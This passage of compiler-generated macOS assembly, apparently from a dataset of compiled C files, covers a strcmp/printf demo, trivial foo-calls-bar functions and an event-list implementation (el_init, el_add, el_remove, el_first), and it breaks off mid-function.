.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $48, %rsp movl $0, -4(%rbp) leaq L_.str(%rip), %rax movq %rax, -16(%rbp) leaq L_.str.1(%rip), %rax movq %rax, -24(%rbp) leaq L_.str.2(%rip), %rax movq %rax, -32(%rbp) movq -24(%rbp), %rdi movq -16(%rbp), %rsi callq _strcmp movl %eax, -36(%rbp) cmpl $0, -36(%rbp) jle LBB0_2 ## %bb.1: movq -24(%rbp), %rsi movq -16(%rbp), %rdx leaq L_.str.3(%rip), %rdi movb $0, %al callq _printf jmp LBB0_3 LBB0_2: movq -24(%rbp), %rsi movq -16(%rbp), %rdx leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf LBB0_3: movq -24(%rbp), %rdi movq -32(%rbp), %rsi callq _strcmp movl %eax, -36(%rbp) cmpl $0, -36(%rbp) jle LBB0_5 ## %bb.4: movq -24(%rbp), %rsi movq -32(%rbp), %rdx leaq L_.str.5(%rip), %rdi movb $0, %al callq _printf jmp LBB0_6 LBB0_5: movq -24(%rbp), %rsi movq -32(%rbp), %rdx leaq L_.str.4(%rip), %rdi movb $0, %al callq _printf LBB0_6: xorl %eax, %eax addq $48, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "abc" L_.str.1: ## @.str.1 .asciz "bc" L_.str.2: ## @.str.2 .asciz "c" L_.str.3: ## @.str.3 .asciz "\"%s\" is greater than \"%s\"" L_.str.4: ## @.str.4 .asciz "\n\"%s\" is less than \"%s\"" L_.str.5: ## @.str.5 .asciz "\n\"%s\" is greater than \"%s\"" .subsections_via_symbols
the_stack_data/48575176.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _foo ; -- Begin function foo .p2align 2 _foo: ; @foo .cfi_startproc ; %bb.0: stp x29, x30, [sp, #-16]! ; 16-byte Folded Spill .cfi_def_cfa_offset 16 mov x29, sp .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 bl _bar mov w0, #0 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _foo ## -- Begin function foo .p2align 4, 0x90 _foo: ## @foo .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _bar xorl %eax, %eax popq %rbp retq .cfi_endproc ## -- End function .subsections_via_symbols
the_stack_data/21948.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _el_init ; -- Begin function el_init .p2align 2 _el_init: ; @el_init .cfi_startproc ; %bb.0: sub sp, sp, #128 .cfi_def_cfa_offset 128 stp x29, x30, [sp, #112] ; 16-byte Folded Spill add x29, sp, #112 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] stur x1, [x29, #-16] stur x2, [x29, #-24] stur w3, [x29, #-28] ldur w8, [x29, #-4] subs w8, w8, #1 cset w8, lt tbnz w8, #0, LBB0_3 b LBB0_1 LBB0_1: ldur x8, [x29, #-24] subs x8, x8, #1 cset w8, lt tbnz w8, #0, LBB0_3 b LBB0_2 LBB0_2: ldur w8, [x29, #-28] subs w8, w8, #1 cset w8, ge tbnz w8, #0, LBB0_4 b LBB0_3 LBB0_3: b LBB0_12 LBB0_4: ldur w8, [x29, #-4] mov w9, #1 str w9, [sp, #20] ; 4-byte Folded Spill add w8, w8, #1 adrp x9, _DU@PAGE str w8, [x9, _DU@PAGEOFF] ldur x8, [x29, #-16] adrp x9, _LB@PAGE str x9, [sp, #8] ; 8-byte Folded Spill str x8, [x9, _LB@PAGEOFF] ldur x8, [x29, #-24] adrp x9, _DT@PAGE str x8, [x9, _DT@PAGEOFF] ldur w8, [x29, #-28] adrp x9, _NLIM@PAGE str w8, [x9, _NLIM@PAGEOFF] mov x0, #56 bl _xmalloc ldr x8, [sp, #8] ; 8-byte Folded Reload str x0, [sp, #24] ldr x8, [x8, _LB@PAGEOFF] ldr x9, [sp, #24] str x8, [x9] ldr x9, [sp, #24] mov w8, #1 strh w8, [x9, #24] ldr x8, [sp, #24] ; kill: def $x9 killed $xzr str xzr, [x8, #40] ldr x8, [sp, #24] str x8, [sp, #32] mov x0, #40 bl _xmalloc ldr x9, [sp, #8] ; 8-byte Folded Reload ldr w8, [sp, #20] ; 4-byte Folded Reload str x0, [sp, #40] ldr x10, [x9, _LB@PAGEOFF] ldr x11, [sp, #40] str x10, [x11] ldr x10, [sp, #40] str w8, [x10, #8] ldr x10, [sp, #24] ldr x11, [sp, #40] str x10, [x11, #16] ldr x10, [sp, #40] str xzr, [x10, #24] ldr x10, [sp, #40] str x10, [sp, #48] ldr x10, [sp, #40] ldr x11, [sp, #24] str x10, [x11, #32] stur xzr, [x29, #-48] ldr x9, [x9, _LB@PAGEOFF] stur x9, [x29, #-40] stur w8, [x29, #-32] b LBB0_5 LBB0_5: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-32] adrp x9, _DU@PAGE ldr w9, [x9, _DU@PAGEOFF] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB0_11 b LBB0_6 LBB0_6: ; in Loop: Header=BB0_5 Depth=1 ldur x8, [x29, #-40] adrp x9, _DT@PAGE ldr x9, [x9, _DT@PAGEOFF] add x8, x8, x9 stur x8, [x29, #-40] mov x0, #56 bl _xmalloc str x0, [sp, #24] ldur x8, [x29, #-40] ldr x9, [sp, #24] str x8, [x9] ldr x9, [sp, #24] mov w8, #1 strh w8, [x9, #24] ldr x8, [sp, #32] ldr x9, [sp, #24] str x8, [x9, #40] ldr x8, [sp, #24] ldr x9, [sp, #32] str x8, [x9, #48] ldr x8, [sp, #24] str x8, [sp, #32] mov x0, #40 bl _xmalloc str x0, [sp, #40] ldur x8, [x29, #-40] ldr x9, [sp, #40] str x8, [x9] ldr x9, [sp, #40] mov w8, #1 str w8, [x9, #8] ldr x8, [sp, #24] ldr x9, [sp, #40] str x8, [x9, #16] ldr x8, [sp, #48] ldr x9, [sp, #40] str x8, [x9, #24] ldr x8, [sp, #40] ldr x9, [sp, #48] str x8, [x9, #32] ldr x8, [sp, #40] str x8, [sp, #48] ldr x8, [sp, #40] ldr x9, [sp, #24] str x8, [x9, #32] mov x0, #16 bl _xmalloc str x0, [sp, #56] ldr x8, [sp, #40] ldr x9, [sp, #56] str x8, [x9] ldur x8, [x29, #-48] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB0_8 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_5 Depth=1 ldr x8, [sp, #56] adrp x9, _index@PAGE str x8, [x9, _index@PAGEOFF] b LBB0_9 LBB0_8: ; in Loop: Header=BB0_5 Depth=1 ldr x8, [sp, #56] ldur x9, [x29, #-48] str x8, [x9, #8] b LBB0_9 LBB0_9: ; in Loop: Header=BB0_5 Depth=1 ldr x8, [sp, #56] stur x8, [x29, #-48] b LBB0_10 LBB0_10: ; in Loop: Header=BB0_5 Depth=1 ldur w8, [x29, #-32] add w8, w8, #1 stur w8, [x29, #-32] b LBB0_5 LBB0_11: mov x0, #56 bl _xmalloc str x0, [sp, #24] ldr x9, [sp, #24] mov x8, #2147483647 str x8, [sp] ; 8-byte Folded Spill str x8, [x9] ldr x9, [sp, #24] mov w8, #1 strh w8, [x9, #24] ldr x8, [sp, #32] ldr x9, [sp, #24] str x8, [x9, #40] ldr x8, [sp, #24] ; kill: def $x9 killed $xzr str xzr, [x8, #48] ldr x8, [sp, #24] ldr x9, [sp, #32] str x8, [x9, #48] mov x0, #40 bl _xmalloc ldr x8, [sp] ; 8-byte Folded Reload str x0, [sp, #40] ldr x9, [sp, #40] str x8, [x9] ldr x9, [sp, #40] mov w8, #1 str w8, [x9, #8] ldr x8, [sp, #24] ldr x9, [sp, #40] str x8, [x9, #16] ldr x8, [sp, #48] ldr x9, [sp, #40] str x8, [x9, #24] ldr x8, [sp, #40] str xzr, [x8, #32] ldr x8, [sp, #40] ldr x9, [sp, #48] str x8, [x9, #32] ldr x8, [sp, #40] ldr x9, [sp, #24] str x8, [x9, #32] mov x0, #16 bl _xmalloc str x0, [sp, #56] ldr x8, [sp, #40] ldr x9, [sp, #56] str x8, [x9] ldr x8, [sp, #56] str xzr, [x8, #8] ldr x8, [sp, #56] ldur x9, [x29, #-48] str x8, [x9, #8] adrp x8, _current@PAGE str xzr, [x8, _current@PAGEOFF] b LBB0_12 LBB0_12: ldp x29, x30, [sp, #112] ; 16-byte Folded Reload add sp, sp, #128 ret .cfi_endproc ; -- End function .globl _el_add ; -- Begin function el_add .p2align 2 _el_add: ; @el_add .cfi_startproc ; %bb.0: sub sp, sp, #96 .cfi_def_cfa_offset 96 stp x29, x30, [sp, #80] ; 16-byte Folded Spill add x29, sp, #80 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-16] stur x1, [x29, #-24] stur w2, [x29, #-28] adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: ldur x8, [x29, #-24] subs x8, x8, #0 cset w8, gt tbnz w8, #0, LBB1_3 b LBB1_2 LBB1_2: mov w8, #-1 stur w8, [x29, #-4] b LBB1_26 LBB1_3: ldur x8, [x29, #-24] adrp x9, _LB@PAGE ldr x9, [x9, _LB@PAGEOFF] subs x8, x8, x9 cset w8, ge tbnz w8, #0, LBB1_5 b LBB1_4 LBB1_4: mov w8, #-2 stur w8, [x29, #-4] b LBB1_26 LBB1_5: mov x0, #56 bl _xmalloc str x0, [sp, #16] ldur x8, [x29, #-24] ldr x9, [sp, #16] str x8, [x9] ldur w8, [x29, #-28] ldr x9, [sp, #16] str w8, [x9, #8] ldur x8, [x29, #-16] ldr x9, [sp, #16] str x8, [x9, #16] ldr x8, [sp, #16] strh wzr, [x8, #24] ldr x8, [sp, #16] ; kill: def $x9 killed $xzr str xzr, [x8, #32] adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] str x8, [sp, #40] b LBB1_6 LBB1_6: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #40] ldr x8, [x8] ldr x8, [x8] ldur x9, [x29, #-24] subs x8, x8, x9 cset w8, gt tbnz w8, #0, LBB1_8 b LBB1_7 LBB1_7: ; in Loop: Header=BB1_6 Depth=1 ldr x8, [sp, #40] ldr x8, [x8, #8] str x8, [sp, #40] b LBB1_6 LBB1_8: ldr x8, [sp, #40] ldr x8, [x8] ldr x8, [x8, #24] str x8, [sp, #32] b LBB1_9 LBB1_9: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #32] ldr x8, [x8] ldur x9, [x29, #-24] subs x8, x8, x9 cset w8, le tbnz w8, #0, LBB1_11 b LBB1_10 LBB1_10: ; in Loop: Header=BB1_9 Depth=1 ldr x8, [sp, #32] ldr x8, [x8, #24] str x8, [sp, #32] b LBB1_9 LBB1_11: ldr x8, [sp, #32] ldr x8, [x8, #32] str x8, [sp, #32] ldr x8, [sp, #32] ldr w8, [x8, #8] adrp x9, _NLIM@PAGE ldr w9, [x9, _NLIM@PAGEOFF] subs w8, w8, w9 cset w8, ne tbnz w8, #0, LBB1_19 b LBB1_12 LBB1_12: adrp x8, _NLIM@PAGE ldr w8, [x8, _NLIM@PAGEOFF] mov w9, #2 sdiv w8, w8, w9 ldr x9, [sp, #32] str w8, [x9, #8] ldr x8, [sp, #32] ldr x8, [x8, #16] str x8, [sp, #8] mov w8, #1 str w8, [sp, #4] b LBB1_13 LBB1_13: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #4] adrp x9, _NLIM@PAGE ldr w9, [x9, _NLIM@PAGEOFF] mov w10, #2 sdiv w9, w9, w10 subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_16 b LBB1_14 LBB1_14: ; in Loop: Header=BB1_13 Depth=1 ldr x8, [sp, #8] ldr x8, [x8, #40] str x8, [sp, #8] b LBB1_15 LBB1_15: ; in Loop: Header=BB1_13 Depth=1 ldr w8, [sp, #4] add w8, w8, #1 str w8, [sp, #4] b LBB1_13 LBB1_16: mov x0, #40 bl _xmalloc str x0, [sp, #24] ldr x8, [sp, #8] ldr x8, [x8] ldr x9, [sp, #24] str x8, [x9] adrp x9, _NLIM@PAGE ldr w8, [x9, _NLIM@PAGEOFF] ldr w9, [x9, _NLIM@PAGEOFF] mov w10, #2 sdiv w9, w9, w10 subs w8, w8, w9 ldr x9, [sp, #24] str w8, [x9, #8] ldr x8, [sp, #8] ldr x9, [sp, #24] str x8, [x9, #16] ldr x8, [sp, #32] ldr x9, [sp, #24] str x8, [x9, #32] ldr x8, [sp, #32] ldr x8, [x8, #24] ldr x9, [sp, #24] str x8, [x9, #24] ldr x8, [sp, #24] ldr x9, [sp, #32] str x8, [x9, #24] ldr x8, [sp, #24] ldr x9, [sp, #24] ldr x9, [x9, #24] str x8, [x9, #32] ldr x8, [sp, #24] ldr x9, [sp, #8] str x8, [x9, #32] ldr x8, [sp, #24] ldr x8, [x8] ldur x9, [x29, #-24] subs x8, x8, x9 cset w8, le tbnz w8, #0, LBB1_18 b LBB1_17 LBB1_17: ldr x8, [sp, #24] str x8, [sp, #32] b LBB1_18 LBB1_18: b LBB1_19 LBB1_19: ldr x8, [sp, #32] ldr w8, [x8, #8] add w8, w8, #1 ldr x9, [sp, #32] str w8, [x9, #8] ldr x8, [sp, #32] ldr x8, [x8, #16] str x8, [sp, #8] b LBB1_20 LBB1_20: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #8] ldr x8, [x8] ldur x9, [x29, #-24] subs x8, x8, x9 cset w8, le tbnz w8, #0, LBB1_22 b LBB1_21 LBB1_21: ; in Loop: Header=BB1_20 Depth=1 ldr x8, [sp, #8] ldr x8, [x8, #40] str x8, [sp, #8] b LBB1_20 LBB1_22: ldr x8, [sp, #8] ldr x8, [x8, #48] ldr x9, [sp, #16] str x8, [x9, #48] ldr x8, [sp, #8] ldr x9, [sp, #16] str x8, [x9, #40] ldr x8, [sp, #16] ldr x9, [sp, #8] ldr x9, [x9, #48] str x8, [x9, #40] ldr x8, [sp, #16] ldr x9, [sp, #8] str x8, [x9, #48] adrp x8, _current@PAGE ldr x8, [x8, _current@PAGEOFF] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_24 b LBB1_23 LBB1_23: adrp x8, _current@PAGE ldr x8, [x8, _current@PAGEOFF] ldr x8, [x8] ldur x9, [x29, #-24] subs x8, x8, x9 cset w8, le tbnz w8, #0, LBB1_25 b LBB1_24 LBB1_24: ldr x8, [sp, #16] adrp x9, _current@PAGE str x8, [x9, _current@PAGEOFF] b LBB1_25 LBB1_25: stur wzr, [x29, #-4] b LBB1_26 LBB1_26: ldur w0, [x29, #-4] ldp x29, x30, [sp, #80] ; 16-byte Folded Reload add sp, sp, #96 ret .cfi_endproc ; -- End function .globl _el_remove ; -- Begin function el_remove .p2align 2 _el_remove: ; @el_remove .cfi_startproc ; %bb.0: sub sp, sp, #80 .cfi_def_cfa_offset 80 stp x29, x30, [sp, #64] ; 16-byte Folded Spill add x29, sp, #64 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur w0, [x29, #-4] stur w1, [x29, #-8] adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_2 b LBB2_1 LBB2_1: adrp x8, _current@PAGE ldr x8, [x8, _current@PAGEOFF] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB2_3 b LBB2_2 LBB2_2: b LBB2_42 LBB2_3: adrp x8, _current@PAGE ldr x8, [x8, _current@PAGEOFF] stur x8, [x29, #-16] b LBB2_4 LBB2_4: ; =>This Loop Header: Depth=1 ; Child Loop BB2_6 Depth 2 ; Child Loop BB2_19 Depth 2 ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_33 b LBB2_5 LBB2_5: ; in Loop: Header=BB2_4 Depth=1 b LBB2_6 LBB2_6: ; Parent Loop BB2_4 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq mov w9, #0 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB2_10 b LBB2_7 LBB2_7: ; in Loop: Header=BB2_6 Depth=2 ldur x8, [x29, #-16] ldrsh w8, [x8, #24] subs w8, w8, #0 cset w8, ne mov w9, #1 str w9, [sp, #8] ; 4-byte Folded Spill tbnz w8, #0, LBB2_9 b LBB2_8 LBB2_8: ; in Loop: Header=BB2_6 Depth=2 ldur x8, [x29, #-16] ldr w8, [x8, #8] ldur w9, [x29, #-4] subs w8, w8, w9 cset w8, ne str w8, [sp, #8] ; 4-byte Folded Spill b LBB2_9 LBB2_9: ; in Loop: Header=BB2_6 Depth=2 ldr w8, [sp, #8] ; 4-byte Folded Reload str w8, [sp, #12] ; 4-byte Folded Spill b LBB2_10 LBB2_10: ; in Loop: Header=BB2_6 Depth=2 ldr w8, [sp, #12] ; 4-byte Folded Reload tbz w8, #0, LBB2_12 b LBB2_11 LBB2_11: ; in Loop: Header=BB2_6 Depth=2 ldur x8, [x29, #-16] ldr x8, [x8, #48] stur x8, [x29, #-16] b LBB2_6 LBB2_12: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_30 b LBB2_13 LBB2_13: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #32] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_16 b LBB2_14 LBB2_14: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #32] ldr w8, [x8, #8] subs w8, w8, #1 cset w8, ne tbnz w8, #0, LBB2_16 b LBB2_15 LBB2_15: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #32] str x8, [sp, #32] ldr x8, [sp, #32] ldr x8, [x8, #32] ldr x9, [sp, #32] ldr x9, [x9, #24] str x8, [x9, #32] ldr x8, [sp, #32] ldr x8, [x8, #24] ldr x9, [sp, #32] ldr x9, [x9, #32] str x8, [x9, #24] ldr x0, [sp, #32] bl _free b LBB2_29 LBB2_16: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #32] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_18 b LBB2_17 LBB2_17: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #32] ldur x9, [x29, #-16] ldr x9, [x9, #40] str x8, [x9, #32] ldur x8, [x29, #-16] ldr x8, [x8, #40] ldr x8, [x8] ldur x9, [x29, #-16] ldr x9, [x9, #32] str x8, [x9] ldur x8, [x29, #-16] ldr x8, [x8, #40] ldur x9, [x29, #-16] ldr x9, [x9, #32] str x8, [x9, #16] b LBB2_18 LBB2_18: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-16] stur x8, [x29, #-24] b LBB2_19 LBB2_19: ; Parent Loop BB2_4 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-24] ldr x8, [x8, #32] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB2_21 b LBB2_20 LBB2_20: ; in Loop: Header=BB2_19 Depth=2 ldur x8, [x29, #-24] ldr x8, [x8, #48] stur x8, [x29, #-24] b LBB2_19 LBB2_21: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-24] ldr x8, [x8, #32] str x8, [sp, #32] ldr x8, [sp, #32] ldr w8, [x8, #8] subs w8, w8, #1 ldr x9, [sp, #32] str w8, [x9, #8] ldr x8, [sp, #32] ldr x8, [x8, #24] str x8, [sp, #24] ldr x8, [sp, #32] ldr x8, [x8, #32] str x8, [sp, #16] ldr x8, [sp, #24] ldr x8, [x8, #16] ldrh w8, [x8, #24] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB2_24 b LBB2_22 LBB2_22: ; in Loop: Header=BB2_4 Depth=1 ldr x8, [sp, #24] ldr w8, [x8, #8] ldr x9, [sp, #32] ldr w9, [x9, #8] add w8, w8, w9 adrp x9, _NLIM@PAGE ldr w9, [x9, _NLIM@PAGEOFF] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB2_24 b LBB2_23 LBB2_23: ; in Loop: Header=BB2_4 Depth=1 ldr x8, [sp, #24] ldr x8, [x8, #16] ; kill: def $x9 killed $xzr str xzr, [x8, #32] ldr x8, [sp, #24] ldr w10, [x8, #8] ldr x9, [sp, #32] ldr w8, [x9, #8] add w8, w8, w10 str w8, [x9, #8] ldr x8, [sp, #32] ldr x9, [sp, #24] ldr x9, [x9, #24] str x8, [x9, #32] ldr x8, [sp, #24] ldr x8, [x8, #24] ldr x9, [sp, #32] str x8, [x9, #24] ldr x0, [sp, #24] bl _free b LBB2_28 LBB2_24: ; in Loop: Header=BB2_4 Depth=1 ldr x8, [sp, #32] ldr x8, [x8, #16] ldrh w8, [x8, #24] subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB2_27 b LBB2_25 LBB2_25: ; in Loop: Header=BB2_4 Depth=1 ldr x8, [sp, #16] ldr w8, [x8, #8] ldr x9, [sp, #32] ldr w9, [x9, #8] add w8, w8, w9 adrp x9, _NLIM@PAGE ldr w9, [x9, _NLIM@PAGEOFF] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB2_27 b LBB2_26 LBB2_26: ; in Loop: Header=BB2_4 Depth=1 ldr x8, [sp, #32] ldr x8, [x8, #16] ; kill: def $x9 killed $xzr str xzr, [x8, #32] ldr x8, [sp, #32] ldr w10, [x8, #8] ldr x9, [sp, #16] ldr w8, [x9, #8] add w8, w8, w10 str w8, [x9, #8] ldr x8, [sp, #16] ldr x9, [sp, #32] ldr x9, [x9, #24] str x8, [x9, #32] ldr x8, [sp, #32] ldr x8, [x8, #24] ldr x9, [sp, #16] str x8, [x9, #24] ldr x0, [sp, #32] bl _free b LBB2_27 LBB2_27: ; in Loop: Header=BB2_4 Depth=1 b LBB2_28 LBB2_28: ; in Loop: Header=BB2_4 Depth=1 b LBB2_29 LBB2_29: ; in Loop: Header=BB2_4 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #48] ldur x9, [x29, #-16] ldr x9, [x9, #40] str x8, [x9, #48] ldur x8, [x29, #-16] ldr x8, [x8, #40] ldur x9, [x29, #-16] ldr x9, [x9, #48] str x8, [x9, #40] ldur x8, [x29, #-16] ldr x8, [x8, #48] stur x8, [x29, #-24] ldur x0, [x29, #-16] bl _free ldur x8, [x29, #-24] stur x8, [x29, #-16] b LBB2_30 LBB2_30: ; in Loop: Header=BB2_4 Depth=1 ldur w8, [x29, #-8] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB2_32 b LBB2_31 LBB2_31: b LBB2_33 LBB2_32: ; in Loop: Header=BB2_4 Depth=1 b LBB2_4 LBB2_33: adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] ldr x8, [x8] ldr x8, [x8, #24] str x8, [sp, #32] b LBB2_34 LBB2_34: ; =>This Inner Loop Header: Depth=1 ldr x8, [sp, #32] ldr x8, [x8, #24] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB2_36 b LBB2_35 LBB2_35: ; in Loop: Header=BB2_34 Depth=1 ldr x8, [sp, #32] ldr x8, [x8, #24] str x8, [sp, #32] b LBB2_34 LBB2_36: ldr x8, [sp, #32] ldr x8, [x8, #16] ldr x8, [x8, #48] stur x8, [x29, #-16] b LBB2_37 LBB2_37: ; =>This Inner Loop Header: Depth=1 ldur x8, [x29, #-16] subs x8, x8, #0 cset w8, eq mov w9, #0 str w9, [sp, #4] ; 4-byte Folded Spill tbnz w8, #0, LBB2_39 b LBB2_38 LBB2_38: ; in Loop: Header=BB2_37 Depth=1 ldur x8, [x29, #-16] ldrsh w8, [x8, #24] subs w8, w8, #0 cset w8, ne str w8, [sp, #4] ; 4-byte Folded Spill b LBB2_39 LBB2_39: ; in Loop: Header=BB2_37 Depth=1 ldr w8, [sp, #4] ; 4-byte Folded Reload tbz w8, #0, LBB2_41 b LBB2_40 LBB2_40: ; in Loop: Header=BB2_37 Depth=1 ldur x8, [x29, #-16] ldr x8, [x8, #48] stur x8, [x29, #-16] b LBB2_37 LBB2_41: ldur x8, [x29, #-16] adrp x9, _current@PAGE str x8, [x9, _current@PAGEOFF] b LBB2_42 LBB2_42: ldp x29, x30, [sp, #64] ; 16-byte Folded Reload add sp, sp, #80 ret .cfi_endproc ; -- End function .globl _el_empty ; -- Begin function el_empty .p2align 2 _el_empty: ; @el_empty .cfi_startproc ; %bb.0: sub sp, sp, #16 .cfi_def_cfa_offset 16 adrp x8, _current@PAGE ldr x8, [x8, _current@PAGEOFF] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB3_2 b LBB3_1 LBB3_1: mov w8, #1 str w8, [sp, #12] b LBB3_3 LBB3_2: str wzr, [sp, #12] b LBB3_3 LBB3_3: ldr w0, [sp, #12] add sp, sp, #16 ret .cfi_endproc ; -- End function .globl _el_first ; -- Begin function el_first .p2align 2 _el_first: ; @el_first .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB4_2 b LBB4_1 LBB4_1: adrp x8, _current@PAGE ldr x8, [x8, _current@PAGEOFF] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB4_3 b LBB4_2 LBB4_2: ; kill: def $x8 killed $xzr stur xzr, [x29, #-8] b LBB4_28 LBB4_3: b LBB4_4 LBB4_4: ; =>This Loop Header: Depth=1 ; Child Loop BB4_8 Depth 2 ; Child Loop BB4_11 Depth 2 ; Child Loop BB4_14 Depth 2 adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] ldr x8, [x8] ldr x8, [x8] adrp x9, _current@PAGE ldr x9, [x9, _current@PAGEOFF] ldr x9, [x9] subs x8, x8, x9 cset w8, ge tbnz w8, #0, LBB4_17 b LBB4_5 LBB4_5: ; in Loop: Header=BB4_4 Depth=1 adrp x8, _DU@PAGE ldr w8, [x8, _DU@PAGEOFF] subs w8, w8, #2 cset w8, ne tbnz w8, #0, LBB4_7 b LBB4_6 LBB4_6: ; in Loop: Header=BB4_4 Depth=1 adrp x8, _index@PAGE ldr x8, [x8, _index@PAGEOFF] ldr x8, [x8] stur x8, [x29, #-32] adrp x8, _DT@PAGE ldr x11, [x8, _DT@PAGEOFF] ldur x10, [x29, #-32] ldr x9, [x10] add x9, x9, x11 str x9, [x10] ldr x10, [x8, _DT@PAGEOFF] ldur x8, [x29, #-32] ldr x9, [x8, #16] ldr x8, [x9] add x8, x8, x10 str x8, [x9] b LBB4_4 LBB4_7: ; in Loop: Header=BB4_4 Depth=1 adrp x8, _index@PAGE ldr x9, [x8, _index@PAGEOFF] str x9, [sp, #40] ldr x9, [sp, #40] ldr x9, [x9] stur x9, [x29, #-40] ldur x9, [x29, #-40] ldr x9, [x9, #16] stur x9, [x29, #-24] ldur x9, [x29, #-24] ldr x9, [x9, #48] ldur x10, [x29, #-24] ldr x10, [x10, #40] str x9, [x10, #48] ldur x9, [x29, #-24] ldr x9, [x9, #40] ldur x10, [x29, #-24] ldr x10, [x10, #48] str x9, [x10, #40] ldur x9, [x29, #-40] ldr x9, [x9, #32] ldur x10, [x29, #-40] ldr x10, [x10, #24] str x9, [x10, #32] ldur x9, [x29, #-40] ldr x9, [x9, #24] ldur x10, [x29, #-40] ldr x10, [x10, #32] str x9, [x10, #24] ldr x9, [x8, _index@PAGEOFF] ldr x9, [x9, #8] str x9, [x8, _index@PAGEOFF] ldr x8, [x8, _index@PAGEOFF] str x8, [sp, #48] b LBB4_8 LBB4_8: ; Parent Loop BB4_4 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x8, [sp, #48] ldr x8, [x8, #8] ldr x8, [x8, #8] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB4_10 b LBB4_9 LBB4_9: ; in Loop: Header=BB4_8 Depth=2 ldr x8, [sp, #48] ldr x8, [x8, #8] str x8, [sp, #48] b LBB4_8 LBB4_10: ; in Loop: Header=BB4_4 Depth=1 ldr x8, [sp, #48] ldr x8, [x8] stur x8, [x29, #-32] ldur x8, [x29, #-32] ldr x8, [x8] adrp x9, _DT@PAGE ldr x9, [x9, _DT@PAGEOFF] add x8, x8, x9 str x8, [sp, #16] b LBB4_11 LBB4_11: ; Parent Loop BB4_4 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x8, [x29, #-32] ldr x8, [x8] ldr x9, [sp, #16] subs x8, x8, x9 cset w8, ge tbnz w8, #0, LBB4_13 b LBB4_12 LBB4_12: ; in Loop: Header=BB4_11 Depth=2 ldur x8, [x29, #-32] ldr x8, [x8, #32] stur x8, [x29, #-32] b LBB4_11 LBB4_13: ; in Loop: Header=BB4_4 Depth=1 ldur x8, [x29, #-32] 